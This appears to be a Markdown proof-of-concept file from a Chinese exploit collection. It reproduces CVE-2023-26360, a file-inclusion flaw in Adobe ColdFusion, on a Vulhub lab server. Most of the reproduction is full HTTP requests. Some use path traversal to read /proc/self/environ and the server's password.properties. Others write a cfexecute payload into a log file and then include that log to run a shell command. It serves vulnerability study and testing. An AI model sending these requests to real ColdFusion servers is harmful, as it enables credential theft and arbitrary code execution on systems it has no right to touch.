admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

82 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360
## 漏洞描述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言。
Adobe ColdFusion 2018 Update 15 和 2021 Update 5 版本及以前,存在一处文件包含漏洞。攻击者可以利用该漏洞在服务器上执行任意代码。
参考链接:
- [https://xz.aliyun.com/t/13392](https://xz.aliyun.com/t/13392)
## 环境搭建
Vulhub启动一个Adobe ColdFusion 2018.0.15服务器:
```
docker compose up -d
```
等待一段时间后环境启动成功,访问`http://your-vps-ip:8500/CFIDE/administrator/index.cfm`,输入密码`vulhub`即可成功安装Adobe ColdFusion。
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153449288.png)
## 漏洞复现
发送如下请求即可读取文件`/proc/self/environ`
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}
```
可以在返回包中找到Adobe ColdFusion的根目录`/opt/coldfusion/cfusion`
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153705716.png)
`../../../../../../../../opt/coldfusion/cfusion/lib/password.properties`中读取服务器密码:
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153740311.png)
想要利用文件包含漏洞执行任意代码需要先发送如下请求来写入CFM脚本
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
_variables=<cfexecute name='id' outputFile='/tmp/awesome_poc' ></cfexecute>
```
然后包含日志文件执行该CFM代码
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-vps-ip:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}
```
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153957320.png)
可见,`id`命令的执行结果已经被写入`/tmp/awesome_poc
![](images/Adobe%20ColdFusion%20本地文件包含漏洞%20CVE-2023-26360/image-20240226153931349.png)
Reference in New Issue View Git Blame Copy Permalink